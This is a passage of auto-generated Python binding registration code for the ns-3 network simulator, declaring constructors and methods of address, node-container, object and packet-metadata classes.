[param('ns3::Ipv6Prefix const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
return
def register_Ns3Mac48Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(ns3::Mac48Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48Address const &', 'arg0')])
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(char const * str) [constructor]
cls.add_constructor([param('char const *', 'str')])
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::Allocate() [member function]
cls.add_method('Allocate',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Mac48Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyFrom(uint8_t const * buffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'buffer')])
## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'buffer')],
is_const=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv4Address address) [member function]
cls.add_method('GetMulticast',
'ns3::Mac48Address',
[param('ns3::Ipv4Address', 'address')],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv6Address address) [member function]
cls.add_method('GetMulticast',
'ns3::Mac48Address',
[param('ns3::Ipv6Address', 'address')],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast6Prefix() [member function]
cls.add_method('GetMulticast6Prefix',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticastPrefix() [member function]
cls.add_method('GetMulticastPrefix',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsGroup() const [member function]
cls.add_method('IsGroup',
'bool',
[],
is_const=True)
## mac48-address.h (module 'network'): static bool ns3::Mac48Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
def register_Ns3Mac64Address_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## mac64-address.h (module 'network'): ns3::Mac64Address::Mac64Address(ns3::Mac64Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac64Address const &', 'arg0')])
## mac64-address.h (module 'network'): ns3::Mac64Address::Mac64Address() [constructor]
cls.add_constructor([])
## mac64-address.h (module 'network'): ns3::Mac64Address::Mac64Address(char const * str) [constructor]
cls.add_constructor([param('char const *', 'str')])
## mac64-address.h (module 'network'): static ns3::Mac64Address ns3::Mac64Address::Allocate() [member function]
cls.add_method('Allocate',
'ns3::Mac64Address',
[],
is_static=True)
## mac64-address.h (module 'network'): static ns3::Mac64Address ns3::Mac64Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Mac64Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## mac64-address.h (module 'network'): void ns3::Mac64Address::CopyFrom(uint8_t const * buffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'buffer')])
## mac64-address.h (module 'network'): void ns3::Mac64Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'buffer')],
is_const=True)
## mac64-address.h (module 'network'): static bool ns3::Mac64Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
def register_Ns3NetDeviceContainer_methods(root_module, cls):
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'arg0')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer() [constructor]
cls.add_constructor([])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::Ptr<ns3::NetDevice> dev) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::NetDevice >', 'dev')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(std::string devName) [constructor]
cls.add_constructor([param('std::string', 'devName')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & a, ns3::NetDeviceContainer const & b) [constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'a'), param('ns3::NetDeviceContainer const &', 'b')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::NetDeviceContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NetDeviceContainer', 'other')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(std::string deviceName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'deviceName')])
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::NetDeviceContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True)
## net-device-container.h (module 'network'): uint32_t ns3::NetDeviceContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3NodeContainer_methods(root_module, cls):
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor]
cls.add_constructor([])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor]
cls.add_constructor([param('std::string', 'nodeName')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NodeContainer', 'other')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'nodeName')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n')])
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n'), param('uint32_t', 'systemId')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'i')],
is_const=True)
## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function]
cls.add_method('GetGlobal',
'ns3::NodeContainer',
[],
is_static=True)
## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3NodeList_methods(root_module, cls):
## node-list.h (module 'network'): ns3::NodeList::NodeList() [constructor]
cls.add_constructor([])
## node-list.h (module 'network'): ns3::NodeList::NodeList(ns3::NodeList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeList const &', 'arg0')])
## node-list.h (module 'network'): static uint32_t ns3::NodeList::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'uint32_t',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_static=True)
## node-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeList::Begin() [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_static=True)
## node-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeList::End() [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_static=True)
## node-list.h (module 'network'): static uint32_t ns3::NodeList::GetNNodes() [member function]
cls.add_method('GetNNodes',
'uint32_t',
[],
is_static=True)
## node-list.h (module 'network'): static ns3::Ptr<ns3::Node> ns3::NodeList::GetNode(uint32_t n) [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'n')],
is_static=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3ObjectFactory_methods(root_module, cls):
cls.add_output_stream_operator()
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor]
cls.add_constructor([param('std::string', 'typeId')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('ns3::TypeId', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('char const *', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('std::string', 'tid')])
return
def register_Ns3PacketMetadata_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[param('ns3::Buffer', 'buffer')],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
cls.add_method('CreateFragment',
'ns3::PacketMetadata',
[param('uint32_t', 'start'), param('uint32_t', 'end')],
is_const=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
cls.add_method('Enable',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('RemoveHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('RemoveTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor]
cls.add_constructor([])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable]
cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable]
cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable]
cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable]
cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable]
cls.add_instance_attribute('isFragment', 'bool', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor]
cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketMetadata::Item',
[])
return
def register_Ns3PacketSocketAddress_methods(root_module, cls):
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress::PacketSocketAddress(ns3::PacketSocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocketAddress const &', 'arg0')])
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress::PacketSocketAddress() [constructor]
cls.add_constructor([])
## packet-socket-address.h (module 'network'): static ns3::PacketSocketAddress ns3::PacketSocketAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::PacketSocketAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
## packet-socket-address.h (module 'network'): ns3::Address ns3::PacketSocketAddress::GetPhysicalAddress() const [member function]
cls.add_method('GetPhysicalAddress',
'ns3::Address',
[],
is_const=True)
## packet-socket-address.h (module 'network'): uint16_t ns3::PacketSocketAddress::GetProtocol() const [member function]
cls.add_method('GetProtocol',
'uint16_t',
[],
is_const=True)
## packet-socket-address.h (module 'network'): uint32_t ns3::PacketSocketAddress::GetSingleDevice() const [member function]
cls.add_method('GetSingleDevice',
'uint32_t',
[],
is_const=True)
## packet-socket-address.h (module 'network'): static bool ns3::PacketSocketAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## packet-socket-address.h (module 'network'): bool ns3::PacketSocketAddress::IsSingleDevice() const [member function]
cls.add_method('IsSingleDevice',
'bool',
[],
is_const=True)
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetAllDevices() [member function]
cls.add_method('SetAllDevices',
'void',
[])
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetPhysicalAddress(ns3::Address const address) [member function]
cls.add_method('SetPhysicalAddress',
'void',
[param('ns3::Address const', 'address')])
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetProtocol(uint16_t protocol) [member function]
cls.add_method('SetProtocol',
'void',
[param('uint16_t', 'protocol')])
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetSingleDevice(uint32_t device) [member function]
cls.add_method('SetSingleDevice',
'void',
[param('uint32_t', 'device')])
return
def register_Ns3PacketSocketHelper_methods(root_module, cls):
## packet-socket-helper.h (module 'network'): ns3::PacketSocketHelper::PacketSocketHelper() [constructor]
cls.add_constructor([])
## packet-socket-helper.h (module 'network'): ns3::PacketSocketHelper::PacketSocketHelper(ns3::PacketSocketHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocketHelper const &', 'arg0')])
## packet-socket-helper.h (module 'network'): void ns3::PacketSocketHelper::Install(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('Install',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_const=True)
## packet-socket-helper.h (module 'network'): void ns3::PacketSocketHelper::Install(std::string nodeName) const [member function]
cls.add_method('Install',
'void',
[param('std::string', 'nodeName')],
is_const=True)
## packet-socket-helper.h (module 'network'): void ns3::PacketSocketHelper::Install(ns3::NodeContainer c) const [member function]
cls.add_method('Install',
'void',
[param('ns3::NodeContainer', 'c')],
is_const=True)
return
def register_Ns3PacketTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketTagIterator::Item',
[])
return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3PacketTagList_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function]
cls.add_method('Add',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function]
cls.add_method('Head',
'ns3::PacketTagList::TagData const *',
[],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function]
cls.add_method('Peek',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function]
cls.add_method('Remove',
'bool',
[param('ns3::Tag &', 'tag')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
